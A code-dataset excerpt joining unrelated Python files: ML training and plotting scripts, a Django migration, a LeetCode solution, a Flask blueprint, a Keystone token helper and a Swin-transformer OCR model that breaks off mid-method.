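    stations_to_ignore = {"zimm", "wtzr"}  # hypothetical station names
    keep_idx = np.ones(dset.num_obs, dtype=bool)
    for station in stations_to_ignore:
        # assumes the dataset exposes station names as an array-like 'station' field
        keep_idx &= dset.station != station
    return keep_idx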
bld/libs/builder/src/steps/copyfilestep.py
webbers/dongle.net
2
12764075
<reponame>webbers/dongle.net<filename>bld/libs/builder/src/steps/copyfilestep.py import os import distutils.file_util from steps.abstractstep import * class CopyFileStep(AbstractStep): """Copy File Step""" def __init__( self, srcFile, destFile, overwrite = 1, makeDir = 1 ): AbstractStep.__init__( self, "Copy File" ) self.srcFile = srcFile self.destFile = destFile self.overwrite = overwrite self.makeDir = makeDir def do( self ): self.reporter.message( "COPY FILE: %s => %s" % ( self.srcFile, self.destFile ) ) result = distutils.file_util.copy_file(self.srcFile, self.destFile) #result = StCommon.CopyFile( self.srcFile, self.destFile, self.overwrite, self.makeDir ) return result
1.398438
1
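For context, here is a stand-alone sketch of the same copy operation using only the standard library; shutil replaces distutils.file_util because distutils is deprecated in recent Python versions, and the paths in the commented call are hypothetical. This is illustrative only, not part of the build framework above.

import os
import shutil


def copy_file(src_file, dest_file, make_dir=True):
    """Copy src_file to dest_file, creating the destination directory first if requested."""
    if make_dir:
        dest_dir = os.path.dirname(dest_file)
        if dest_dir:
            os.makedirs(dest_dir, exist_ok=True)
    return shutil.copy(src_file, dest_file)


# copy_file("bld/output/dongle.dll", "dist/dongle.dll")  # hypothetical paths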
scripts/train.py
CrhistyanSilva/localbitsback
0
12764203
# !/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function import argparse import datetime import json import math import os import random import time import numpy as np import torch import torch.optim as optim import torch.utils.data import compression from compression.utils import load_imagenet_data from optimization.training import train, evaluate random.seed(7610) parser = argparse.ArgumentParser(description='PyTorch Discrete Normalizing flows') parser.add_argument('--imagenet64_data_path', type=str, default='~/data/imagenet-small/train_64x64.npy') parser.add_argument('--imagenet64_valid_data_path', type=str, default='~/data/imagenet-small/valid_64x64.npy') parser.add_argument('--imagenet64_model', type=str, default=None) parser.add_argument('--state_parameters', type=str, default=None) parser.add_argument('--from_torch', action="store_true") parser.add_argument('--manual_seed', type=int, help='manual seed, if not given resorts to random seed.') parser.add_argument('--evaluate_interval_epochs', type=int, default=5, help='Evaluate per how many epochs') parser.add_argument('--snap_images', type=int, default=100000, help='Number of images to process on training before save snapshots') parser.add_argument('-od', '--out_dir', type=str, default='./', help='output directory for model snapshots etc.') # optimization settings parser.add_argument('-e', '--epochs', type=int, default=100, metavar='EPOCHS', help='number of epochs to train (default: 2000)') parser.add_argument('-bs', '--batch_size', type=int, default=2, metavar='BATCH_SIZE', help='input batch size for training (default: 100)') parser.add_argument('-lr', '--learning_rate', type=float, default=0.00001, metavar='LEARNING_RATE', help='learning rate') parser.add_argument('--step_size', default=10000, type=float, help='Number of batch iteration to update the learning rate') parser.add_argument('--gamma', default=0.1, type=float, help='Multiplicative factor of learning rate decay') args = parser.parse_args() if args.manual_seed is None: args.manual_seed = random.randint(1, 100000) random.seed(args.manual_seed) torch.manual_seed(args.manual_seed) np.random.seed(args.manual_seed) def run(args): print('\nMODEL SETTINGS: \n', args, '\n') print("Random Seed: ", args.manual_seed) # ================================================================================================================== # SNAPSHOTS # ================================================================================================================== args.model_signature = str(datetime.datetime.now())[0:19].replace(' ', '_') args.model_signature = args.model_signature.replace(':', '_') os.makedirs(args.out_dir, exist_ok=True) snap_dir = args.out_dir with open(os.path.join(snap_dir, 'log.txt'), 'a') as ff: print('\nMODEL SETTINGS: \n', args, '\n', file=ff) # SAVING torch.save(args, snap_dir + '.config') # Load snapshot parameters parameters_dict = None if args.state_parameters is not None: assert os.path.isfile(args.state_parameters) parameters_dict = json.load(open(args.state_parameters)) args.learning_rate = parameters_dict['scheduler']['_last_lr'][0] args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print('Device:', args.device) # ================================================================================================================== # LOAD DATA # ================================================================================================================== dataset = 
load_imagenet_data(os.path.expanduser(args.imagenet64_data_path)) validation_dataset = load_imagenet_data(os.path.expanduser(args.imagenet64_valid_data_path)) train_loader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size, shuffle=True, drop_last=False) val_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False) # test_loader = torch.utils.data.DataLoader( # dataset, # batch_size=args.batch_size, # shuffle=False, # **kwargs) args.input_size = [3, 64, 64] # ================================================================================================================== # SELECT MODEL # ================================================================================================================== # flow parameters and architecture choice are passed on to model through args print(args.input_size) from compression.models.load_flowpp_imagenet64 import Imagenet64Model # Load model if args.imagenet64_model is None: model = Imagenet64Model(force_float32_cond=True).eval() else: model_ctor = compression.models.load_imagenet64_model model_filename = os.path.expanduser(args.imagenet64_model) model = model_ctor(model_filename, force_float32_cond=True, from_torch=args.from_torch) model.to(device=args.device) model_sample = model optimizer = optim.Adam(model.parameters(), lr=args.learning_rate) scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args.step_size, gamma=args.gamma) # ================================================================================================================== # TRAINING # ================================================================================================================== train_bpd = [] val_bpd = [] # for early stopping best_val_bpd = np.inf best_val_loss = np.inf if args.state_parameters is None: last_epoch = 1 run_number = 1 else: last_epoch = parameters_dict['epoch'] run_number = parameters_dict['run_number'] + 1 scheduler.load_state_dict(parameters_dict['scheduler']) train_times = [] model.double() for epoch in range(last_epoch, args.epochs + 1): t_start = time.time() if parameters_dict is not None: tr_loss, tr_bpd = train(epoch, train_loader, model, optimizer, args, scheduler, True, parameters_dict['batch_idx'], run_number) else: tr_loss, tr_bpd = train(epoch, train_loader, model, optimizer, args, scheduler, False) train_bpd.append(tr_bpd) train_times.append(time.time() - t_start) print('One training epoch took %.2f seconds' % (time.time() - t_start)) if epoch < 5 or epoch % args.evaluate_interval_epochs == 0: v_loss, v_bpd = evaluate( val_loader, model, model_sample, args, epoch=epoch, file=snap_dir + 'log.txt') val_bpd.append(v_bpd) best_val_bpd = min(v_bpd, best_val_bpd) best_val_loss = min(v_loss, best_val_loss) print('(BEST: val bpd {:.4f}, val loss {:.4f})\n'.format(best_val_bpd, best_val_loss)) print(f'VALIDATION: loss: {v_loss}, bpd: {v_bpd}') if math.isnan(v_loss): raise ValueError('NaN encountered!') train_bpd = np.hstack(train_bpd) val_bpd = np.array(val_bpd) # training time per epoch train_times = np.array(train_times) mean_train_time = np.mean(train_times) std_train_time = np.std(train_times, ddof=1) print('Average train time per epoch: %.2f +/- %.2f' % (mean_train_time, std_train_time)) # ================================================================================================================== # EVALUATION # ================================================================================================================== final_model = 
torch.load(snap_dir + 'a.model')
    test_loss, test_bpd = evaluate(
        val_loader, final_model, final_model, args,
        epoch=epoch, file=snap_dir + 'test_log.txt')
    print('Test loss / bpd: %.2f / %.2f' % (test_loss, test_bpd))


if __name__ == "__main__":
    run(args)
1.9375
2
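As a small self-contained illustration of the Adam + StepLR wiring used in run() above, with a toy model and a much smaller step_size so the decay is visible (none of this is from the original script):

import torch

model = torch.nn.Linear(8, 2)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-5)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=3, gamma=0.1)

for batch_idx in range(9):
    optimizer.step()                      # normally preceded by a forward/backward pass on a batch
    scheduler.step()                      # multiply the lr by gamma every `step_size` scheduler steps
    print(batch_idx, scheduler.get_last_lr())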
Gallery/migrations/0011_auto_20210225_0853.py
CiganOliviu/InfiniteShoot
1
12764331
# Generated by Django 3.0.8 on 2021-02-25 08:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('Gallery', '0010_pickedimage'), ] operations = [ migrations.RemoveField( model_name='pickedimage', name='cover_image', ), migrations.AddField( model_name='pickedimage', name='cover_image', field=models.ManyToManyField(to='Gallery.ImagesClient'), ), ]
0.8125
1
src/plotting/figure3.py
UMCUGenetics/svMIL
0
12764459
<filename>src/plotting/figure3.py<gh_stars>0 import sys import numpy as np import matplotlib.pyplot as plt from sklearn.ensemble import RandomForestClassifier import random from scipy import stats from statsmodels.sandbox.stats.multicomp import multipletests import os import os.path import pandas as pd import seaborn as sns from matplotlib.colors import ListedColormap import matplotlib matplotlib.use('Agg') class Figure3: """ Class for plotting figure 3A and 3B. """ def generateHeatmap(self, cancerTypes, loopType, svTypes = ['DEL', 'DUP', 'INV', 'ITX']): """ Handler for generating the feature significance heatmap for all cancer types. First, per cancer type, get the instances and their importance ranking from the random forest. Then compute the significance of the top 100 to 100 randomly sampled instances. Then gather the information in a dictionary and provide it to the plotting function to generate the heatmap. Parameters: - cancerTypes: list of cancer types to run for. These should correspond to the output folder names. - loopType: either TAD or CTCF, used to create output files with different titles. - svTypes: svTypes to use per cancer type. Defaults to all SV types. """ #get the significances for each cancer type pValuesPerCancerType = dict() for cancerType in cancerTypes: print('Processing cancer type: ', cancerType) #first get the instances and their ranking across all SV types importances, instances = self.getFeatureImportances(svTypes, cancerType) #then compute the significances of the top 100 to random 100 instances pValues, zScores = self.computeFeatureSignificances(importances, instances, 100) pValuesPerCancerType[cancerType] = [pValues, zScores] #then make a heatmap plot of the significances. self.plotHeatmap(pValuesPerCancerType, loopType) def plotHeatmap(self, pValuesPerCancerType, loopType): """ Plot the heatmap showing the signficances of each feature (columns) in each cancer type (rows). P-values are binarized into very significant (1e-5) and significant ( < 0.05). These are further binarized into z > 0 and z < 0 to indicate gains and losses of features. Parameters: - pValuesPerCancerType: dictionary with cancer types as keys and the adjusted p-values and z-scores from computeFeatureSignificances as entry 0 and 1. """ #re-format the p-values to a binary style for plotting significanceMatrix = [] shortCancerTypeNames = [] for cancerType in pValuesPerCancerType: #get the short name of the cancer type for plotting clarity splitCancerType = cancerType.split('_') shortCancerType = '_'.join(splitCancerType[1:2]) if loopType == 'CTCF': shortCancerType += '_CTCF' shortCancerTypeNames.append(shortCancerType) significances = [] pValues = pValuesPerCancerType[cancerType][0] zScores = pValuesPerCancerType[cancerType][1] #below this we call it 'very' significant. 
signCutoff = 1e-5 for pValueInd in range(0, len(pValues)): pValue = pValues[pValueInd] significances.append(zScores[pValueInd]) continue if pValue < 0.05 and zScores[pValueInd] > 0: if zScores[pValueInd] > signCutoff: significances.append(2) else: significances.append(1) elif pValue < 0.05 and zScores[pValueInd] < 0: if zScores[pValueInd] < signCutoff: significances.append(-2) else: significances.append(-1) else: significances.append(0) significanceMatrix.append(significances) significanceMatrix = np.array(significanceMatrix) #np.save('signMatrix.npy', significanceMatrix) #print(significanceMatrix) fig =plt.figure(figsize=(15,10)) data = pd.DataFrame(significanceMatrix) #exclude translocations, these are not there for germline. g=sns.heatmap(data,annot=False,square=True, linewidths=0.5, #cmap=ListedColormap(['#0055d4ff', '#0055d47d', '#f7f6f6ff', '#c8373780', '#c83737ff']), cmap="vlag", center=0, yticklabels=shortCancerTypeNames) g.set_yticklabels(g.get_yticklabels(), horizontalalignment='right',fontsize='small') plt.xticks(np.arange(0, significanceMatrix.shape[1])+0.5, ['Gains', 'Losses', 'CpG', 'TF', 'CTCF', 'DNAseI', 'h3k4me3', 'h3k27ac', 'h3k27me3', 'h3k4me1', 'CTCF', 'CTCF+Enhancer', 'CTCF+Promoter', 'Enhancer', 'Heterochromatin', 'Poised_Promoter', 'Promoter', 'Repressed', 'Transcribed', 'RNA pol II', 'CTCF strength', 'RNA pol II strength', 'h3k4me3 strength', 'h3k27ac strength', 'h3k27me3 strength', 'h3k4me1 strength', 'Enhancer type', 'eQTL type', 'Super enhancer type', 'Instance count'], rotation=45, horizontalalignment='right') plt.tight_layout() if loopType == 'TAD': plt.savefig('output/figures/figure3.svg') else: plt.savefig('output/figures/figure4C.svg') def computeFeatureSignificances(self, importances, instances, top): """ Compute the significance of the total occurrence of features in the instances within the provided top X instances with highest feature importance compared to X random instances. Parameters: - importances: allImportances output from self.getFeatureImportances() - instances: allInstances output from self.getFeatureImportances() - top: integer value of top X instances with highest importance to select. Return: - pAdjusted: bonferroni corrected p-values of each feature in the true instances compared to the random instances. - featureZScores: z-scores used to compute the p-values. """ #rank the importances by score indices = np.argsort(importances)[::-1] #then get the top instances topInstances = instances[indices[0:top]] #compute the percentages in these top X instances avgInstances = np.sum(topInstances, axis=0) totalInstances = avgInstances / topInstances.shape[0] #then compare to 100 random instances to see if it is significant. 
#per feature, have a distribution nullDistributions = dict() random.seed(785) for i in range(0,top): if i == 0: for featureInd in range(0, len(totalInstances)): nullDistributions[featureInd] = [] #sample as much random instances as in our filtered instances randomIndices = random.sample(range(0,instances.shape[0]), topInstances.shape[0]) randomTopInstances = instances[randomIndices] #compute the percentages in these top X instances avgRandomInstances = np.sum(randomTopInstances, axis=0) totalRandomInstances = avgRandomInstances / randomTopInstances.shape[0] for featureInd in range(0, len(totalRandomInstances)): nullDistributions[featureInd].append(totalRandomInstances[featureInd]) from math import sqrt #for each feature, compute a z-score featurePValues = [] featureZScores = [] for featureInd in range(0, len(nullDistributions)): if np.std(nullDistributions[featureInd]) == 0: z = 0 pValue = 1 featureZScores.append(z) featurePValues.append(pValue) continue z = (totalInstances[featureInd] - np.mean(nullDistributions[featureInd])) / float(np.std(nullDistributions[featureInd])) pValue = stats.norm.sf(abs(z))*2 featureZScores.append(z) featurePValues.append(pValue) #do MTC on the p-values reject, pAdjusted, _, _ = multipletests(featurePValues, method='bonferroni') return pAdjusted, featureZScores def getFeatureImportances(self, svTypes, cancerType): """ For the given cancer type, compute the random forest feature importances for each model of each SV type. Obtain the full similarity matrix (e.g. not subsampled) and train the RF classifier. Merge the importances of each SV type with the rest, and disregard SV type information as the importances point to similar instances for SV types. Parameters: - svTypes: list with SV types to get the importances for - cancerType: name of cancer type output folder to get data from Return: - allInstances: numpy array with all instances across SV types concatenated - allImportances: feature importance score of instances in allInstances """ #set the directory to look in for this cancer type outDir = 'output/' + cancerType #gather the top 100 instances across all SV types #also return the instances themselves to get the features allInstances = [] allImportances = [] for svType in svTypes: #define the classifiers to use (from optimization) #would be nicer if these are in 1 file somewhere, since they are also used in another script if svType == 'DEL': clf = RandomForestClassifier(random_state=785, n_estimators= 600, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'deletions' elif svType == 'DUP': clf = RandomForestClassifier(random_state=785, n_estimators= 600, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'duplications' elif svType == 'INV': clf = RandomForestClassifier(random_state=785, n_estimators= 200, min_samples_split=5, min_samples_leaf=4, max_features='auto', max_depth=10, bootstrap=True) title = 'inversions' elif svType == 'ITX': clf = RandomForestClassifier(random_state=785, n_estimators= 1000, min_samples_split=5, min_samples_leaf=1, max_features='auto', max_depth=80, bootstrap=True) title = 'translocations' else: print('SV type not supported') exit(1) #load the similarity matrix of this SV type dataPath = outDir + '/multipleInstanceLearning/similarityMatrices/' #check for sv types for which we have no SVs if not os.path.isfile(dataPath + '/similarityMatrix_' + svType + '.npy'): continue similarityMatrix = np.load(dataPath + '/similarityMatrix_' + 
svType + '.npy', encoding='latin1', allow_pickle=True) bagLabels = np.load(dataPath + '/bagLabelsSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) instances = np.load(dataPath + '/instancesSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) bagPairLabels = np.load(dataPath + '/bagPairLabelsSubsampled_' + svType + '.npy', encoding='latin1', allow_pickle=True) bagMap = np.load(dataPath + '/bagMap_' + svType + '.npy', encoding='latin1', allow_pickle=True).item() filteredFeatures = np.loadtxt(dataPath + '/lowVarianceIdx_' + svType + '.txt') #train the classifier on the full dataset clf.fit(similarityMatrix, bagLabels) #get the feature importances importances = list(clf.feature_importances_) allImportances += importances #because low index features are removed, add them back here if necessary #to retain an overview of all used features fixedInstances = [] for instance in instances: finalLength = len(instance) + filteredFeatures.size instanceMal = np.zeros(finalLength) #mal including missing features addedFeatures = 0 for featureInd in range(0, finalLength): if featureInd in filteredFeatures: instanceMal[featureInd] = 0 addedFeatures += 1 else: instanceMal[featureInd] = instance[featureInd-addedFeatures] fixedInstances.append(instanceMal) allInstances += fixedInstances allImportances = np.array(allImportances) allInstances = np.array(allInstances) return allImportances, allInstances #1. Make the figure for all TAD-based runs (Fig 3) cancerTypes = ['HMF_Breast_hmec', 'HMF_Ovary_ov', 'HMF_Lung_luad', 'HMF_Colorectal_coad', 'HMF_UrinaryTract_urinaryTract', 'HMF_Prostate_prostate', 'HMF_Esophagus_esophagus', 'HMF_Skin_skin', 'HMF_Pancreas_pancreas', 'HMF_Uterus_uterus', 'HMF_Kidney_kidney', 'HMF_NervousSystem_nervousSystem'] Figure3().generateHeatmap(cancerTypes, 'TAD') #2. Make the figure for all CTCF-based runs (Fig 4C) cancerTypesCTCF = ['HMF_Breast_CTCF'] Figure3().generateHeatmap(cancerTypesCTCF, 'CTCF')
2.796875
3
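A worked mini-example (illustrative numbers only) of the statistical test inside computeFeatureSignificances above: an observed feature frequency is turned into a z-score against a null distribution built from random samples, converted to a two-sided p-value with stats.norm.sf, and Bonferroni-corrected with multipletests.

import numpy as np
from scipy import stats
from statsmodels.sandbox.stats.multicomp import multipletests

rng = np.random.RandomState(785)
observed = np.array([0.80, 0.52])                         # observed frequency of two features in the top instances
null = rng.binomial(100, 0.5, size=(100, 2)) / 100.0      # null frequencies from 100 random draws of 100 instances

z_scores = (observed - null.mean(axis=0)) / null.std(axis=0)
p_values = stats.norm.sf(np.abs(z_scores)) * 2            # two-sided p-values, as in the class above
reject, p_adjusted, _, _ = multipletests(p_values, method='bonferroni')
print(z_scores, p_adjusted, reject)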
Previous_State_On_Repo/StrokeRecoveryOffline/Data/code/combineWordHinEngBan.py
rohun-tripati/pythonRepo
1
12764587
#!/usr/bin/env python import netcdf_helpers from scipy import * from optparse import OptionParser from xml.dom.minidom import parse import sys, time, os # import tamil_extract as TE # import bangla_extract as BE import hindi_extract as HE import english_extract as EE import engword_extract as EWE import hinword_extract as HWE import banword_extract as BWE #command line options parser = OptionParser() (options, args) = parser.parse_args() if (len(args)<1): print "usage: test/train/val" sys.exit(2) function = args [0] if not function in ["test", "train", "val"]: print "usage: test/train/val" sys.exit(2) labels = ["hindi", "english", "bangla"] seqDims = [] seqLengths = [] targetStrings = [] wordTargetStrings = [] seqTags = [] inputs = [] #Here begins the module functional call for each of the respective indic scripts inputhinword = [] HWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputhinword, True) inputMeans = array([ 43.5716277755 , 72.728701988 , 0.0151754027826 ]) inputStds = array([ 27.3972575236 , 51.9577234449 , 0.122250194 ]) inputhinword = ((array(inputhinword)-inputMeans)/inputStds).tolist() inputs.extend(inputhinword) inputbanword = [] BWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputbanword, True) inputMeans = array([ 39.3020429273 , 64.3542876398 , 0.0174984915094 ]) inputStds = array([ 24.220588125 , 45.5887552493 , 0.131119389505 ]) inputbanword = ((array(inputbanword)-inputMeans)/inputStds).tolist() inputs.extend(inputbanword) inputengword = [] EWE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputengword, True) inputMeans = array([ 44.2994163835 , 68.7957830052 , 0.01821566173 ]) inputStds = array([ 24.4149708067 , 70.159852713 , 0.133730517825 ]) inputengword = ((array(inputengword)-inputMeans)/inputStds).tolist() inputs.extend(inputengword) # inputenglish = [] # EE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputenglish, True) # inputMeans = array([ 21.5401437051 , 19.095532646 , 0.0197438300531 ]) # inputStds = array([ 15.2712299058 , 14.35175744 , 0.139118694746 ]) # inputenglish = ((array(inputenglish)-inputMeans)/inputStds).tolist() # inputs.extend(inputenglish) # inputhindi = [] # HE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputhindi, True) # inputMeans = array([ 116.181545791 , 117.589252273 , 0.0311165710348 ]) # inputStds = array([ 95.3247873525 , 86.246804645 , 0.173632744728 ]) # inputhindi = ((array(inputhindi)-inputMeans)/inputStds).tolist() # inputs.extend(inputhindi) # inputbangla = [] # BE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputbangla, True) # inputMeans = array([ 26.1452919339 , 38.2040724491 , 0.0170435369558 ]) # inputStds = array([ 19.3466051312 , 23.8909551492 , 0.129433592254 ]) # inputbangla = ((array(inputbangla)-inputMeans)/inputStds).tolist() # inputs.extend(inputbangla) # inputtamil = [] # TE.main(function, labels, seqDims, seqLengths, targetStrings, wordTargetStrings, seqTags, inputtamil, True) # inputMeans = array([ 57.8497793792 , 78.1069514634 , 0.00850420629953 ]) # inputStds = array([ 32.9270365136 , 59.0435324226 , 0.0918252948525 ]) # inputtamil = ((array(inputtamil)-inputMeans)/inputStds).tolist() # inputs.extend(inputtamil) # print inputs # print len(labels), labels # print labels #create a new .nc file ncFilename = "combine" + function + ".nc" file = 
netcdf_helpers.NetCDFFile(ncFilename, 'w') #create the dimensions netcdf_helpers.createNcDim(file,'numSeqs',len(seqLengths)) netcdf_helpers.createNcDim(file,'numTimesteps',len(inputs)) netcdf_helpers.createNcDim(file,'inputPattSize',len(inputs[0])) netcdf_helpers.createNcDim(file,'numDims',1) netcdf_helpers.createNcDim(file,'numLabels',len(labels)) #create the variables netcdf_helpers.createNcStrings(file,'seqTags',seqTags,('numSeqs','maxSeqTagLength'),'sequence tags') netcdf_helpers.createNcStrings(file,'labels',labels,('numLabels','maxLabelLength'),'labels') netcdf_helpers.createNcStrings(file,'targetStrings',targetStrings,('numSeqs','maxTargStringLength'),'target strings') netcdf_helpers.createNcStrings(file,'wordTargetStrings',wordTargetStrings,('numSeqs','maxWordTargStringLength'),'word target strings') netcdf_helpers.createNcVar(file,'seqLengths',seqLengths,'i',('numSeqs',),'sequence lengths') netcdf_helpers.createNcVar(file,'seqDims',seqDims,'i',('numSeqs','numDims'),'sequence dimensions') netcdf_helpers.createNcVar(file,'inputs',inputs,'f',('numTimesteps','inputPattSize'),'input patterns') #write the data to disk print "closing file", ncFilename file.close()
1.695313
2
452_Minimum-Number-of-Arrows-to-Burst-Balloons.py
Coalin/Daily-LeetCode-Exercise
3
12764715
<reponame>Coalin/Daily-LeetCode-Exercise # Attempt I: 贪心的思路,方法错。维护一个静态dict不能保证每次remove后余下的序列仍保持有序。 # class Solution: # def findMinArrowShots(self, points): # """ # :type points: List[List[int]] # :rtype: int # """ # left = 10000 # right = -10000 # for i in range(len(points)): # left = min(left, points[i][0]) # right = max(right, points[i][1]) # poi_dic = dict() # poi_dic_len = dict() # count = 0 # for j in range(len(points)): # for x in range(points[j][0], points[j][1]+1): # if x in poi_dic: # poi_dic[x].append(points[j]) # else: # poi_dic[x] = [points[j]] # for key in poi_dic: # poi_dic_len[key] = len(poi_dic[key]) # arror = self.sort_by_value(poi_dic_len) # print(arror) # for y in arror: # if not points: # return count # intersect = False # for n in points: # if n in poi_dic[y]: # intersect = True # break # if intersect: # count += 1 # for m in poi_dic[y]: # try: # points.remove(m) # except: # pass # def sort_by_value(self, d): # items=d.items() # backitems=[[v[1], v[0]] for v in items] # backitems = sorted(backitems, reverse=True) # return [backitems[i][1] for i in range(len(backitems))] # Attempt II:AC class Solution: def findMinArrowShots(self, points): """ :type points: List[List[int]] :rtype: int """ if not points: return 0 points = sorted(points, key=lambda Interval: Interval[0]) count = 1 ref = points[0] for i in range(1, len(points)): if points[i][0] > ref[1]: count += 1 ref = points[i] else: if points[i][1] < ref[1]: ref = [points[i][0], points[i][1]] return count
2.546875
3
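A quick illustrative check of the accepted greedy solution above (assumes the Solution class from this file is in scope; the first input is the standard LeetCode example):

solution = Solution()
print(solution.findMinArrowShots([[10, 16], [2, 8], [1, 6], [7, 12]]))  # -> 2
print(solution.findMinArrowShots([[1, 2], [3, 4], [5, 6], [7, 8]]))     # -> 4
print(solution.findMinArrowShots([]))                                   # -> 0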
donut/modules/editor/__init__.py
rlin0/donut
0
12764843
<reponame>rlin0/donut import flask blueprint = flask.Blueprint( 'editor', __name__, template_folder='templates', static_folder='static', static_url_path='/donut/modules/editor/static') import donut.modules.editor.routes
0.984375
1
sysinv/sysinv/sysinv/sysinv/openstack/common/keystone_objects.py
Wind-River/starlingx-config
0
12764971
<gh_stars>0 # # Copyright (c) 2015 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # import datetime import iso8601 from oslo_log import log LOG = log.getLogger(__name__) class Token(object): def __init__(self, token_data, token_id, region_name): self.expired = False self.data = token_data self.token_id = token_id self.region_name = region_name def set_expired(self): self.expired = True def is_expired(self, within_seconds=300): if not self.expired: end = iso8601.parse_date(self.data['token']['expires_at']) now = iso8601.parse_date(datetime.datetime.utcnow().isoformat()) delta = abs(end - now).seconds return delta <= within_seconds return True def get_id(self): """ Get the identifier of the token. """ return self.token_id def _get_service_url(self, service_type, service_name, interface_type): """ Search the catalog of a service for the url based on the interface Returns: url or None on failure """ for catalog in self.data['token']['catalog']: if catalog['type'] == service_type: if catalog['name'] == service_name: if len(catalog['endpoints']) != 0: for endpoint in catalog['endpoints']: if ((endpoint['interface'] == interface_type) and (endpoint['region'] == self.region_name)): return endpoint['url'] return None def get_service_admin_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'admin') def get_service_internal_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'internal') def get_service_public_url(self, service_type, service_name): """ Search the catalog of a service for the administrative url Returns: admin url or None on failure """ return self._get_service_url(service_type, service_name, 'public') def get_service_url(self, service_type, service_name): return self.get_service_admin_url(service_type, service_name)
1.445313
1
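An illustrative way to drive the Token helper above with a hand-built Keystone-style payload (assumes the class and its iso8601 dependency are importable; the service type/name, region, URL, and token id are placeholders that simply mirror the fields the class reads):

import datetime

token_data = {
    'token': {
        'expires_at': (datetime.datetime.utcnow() + datetime.timedelta(hours=1)).isoformat(),
        'catalog': [{
            'type': 'platform',
            'name': 'sysinv',
            'endpoints': [{
                'interface': 'internal',
                'region': 'RegionOne',
                'url': 'http://127.0.0.1:6385/v1',
            }],
        }],
    },
}

token = Token(token_data, token_id='example-token-id', region_name='RegionOne')
print(token.is_expired())                                     # False (expires in one hour)
print(token.get_service_internal_url('platform', 'sysinv'))   # http://127.0.0.1:6385/v1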
functions.py
gjoe344/python-learning
0
12765099
#Input, arguments def add(x,y): z = x + y b = 'I am here' a = 'hello' return z,b,a x = 20 y = 5 # Calling function print(add(x,y)) z = add(x,y) #same thing print(z) print(add(10,5)) #same thing
2.25
2
models.py
YongWookHa/swin-transformer-ocr
43
12765227
import torch import random import pytorch_lightning as pl from x_transformers import * from x_transformers.autoregressive_wrapper import * from timm.models.swin_transformer import SwinTransformer import utils class SwinTransformerOCR(pl.LightningModule): def __init__(self, cfg, tokenizer): super().__init__() self.cfg = cfg self.tokenizer = tokenizer self.encoder = CustomSwinTransformer( img_size=(cfg.height, cfg.width), patch_size=cfg.patch_size, in_chans=cfg.channels, num_classes=0, window_size=cfg.window_size, embed_dim=cfg.encoder_dim, depths=cfg.encoder_depth, num_heads=cfg.encoder_heads ) self.decoder = CustomARWrapper( TransformerWrapper( num_tokens=len(tokenizer), max_seq_len=cfg.max_seq_len, attn_layers=Decoder( dim=cfg.decoder_dim, depth=cfg.decoder_depth, heads=cfg.decoder_heads, **cfg.decoder_cfg )), pad_value=cfg.pad_token ) self.bos_token = cfg.bos_token self.eos_token = cfg.eos_token self.max_seq_len = cfg.max_seq_len self.temperature = cfg.temperature def configure_optimizers(self): optimizer = getattr(torch.optim, self.cfg.optimizer) optimizer = optimizer(self.parameters(), lr=float(self.cfg.lr)) if not self.cfg.scheduler: scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 1) scheduler = { 'scheduler': scheduler, 'interval': "epoch", "name": "learning rate" } return [optimizer], [scheduler] elif hasattr(torch.optim.lr_scheduler, self.cfg.scheduler): scheduler = getattr(torch.optim.lr_scheduler, self.cfg.scheduler) elif hasattr(utils, self.cfg.scheduler): scheduler = getattr(utils, self.cfg.scheduler) else: raise ModuleNotFoundError scheduler = { 'scheduler': scheduler(optimizer, **self.cfg.scheduler_param), 'interval': self.cfg.scheduler_interval, 'name': "learning rate" } return [optimizer], [scheduler] def forward(self, x): ''' x: (B, C, W, H) labels: (B, S) # B : batch size # W : image width # H : image height # S : source sequence length # E : hidden size # V : vocab size ''' encoded = self.encoder(x) dec = self.decoder.generate(torch.LongTensor([self.bos_token]*len(x))[:, None].to(x.device), self.max_seq_len, eos_token=self.eos_token, context=encoded, temperature=self.temperature) return dec def training_step(self, batch, batch_num): x, y = batch tgt_seq, tgt_mask = y encoded = self.encoder(x) loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded) self.log("train_loss", loss) return {'loss': loss} def validation_step(self, batch, batch_num): x, y = batch tgt_seq, tgt_mask = y encoded = self.encoder(x) loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded) dec = self.decoder.generate((torch.ones(x.size(0),1)*self.bos_token).long().to(x.device), self.max_seq_len, eos_token=self.eos_token, context=encoded, temperature=self.temperature) gt = self.tokenizer.decode(tgt_seq) pred = self.tokenizer.decode(dec) assert len(gt) == len(pred) acc = sum([1 if gt[i] == pred[i] else 0 for i in range(len(gt))]) / x.size(0) return {'val_loss': loss, 'results' : { 'gt' : gt, 'pred' : pred }, 'acc': acc } def validation_epoch_end(self, outputs): val_loss = sum([x['val_loss'] for x in outputs]) / len(outputs) acc = sum([x['acc'] for x in outputs]) / len(outputs) wrong_cases = [] for output in outputs: for i in range(len(output['results']['gt'])): gt = output['results']['gt'][i] pred = output['results']['pred'][i] if gt != pred: 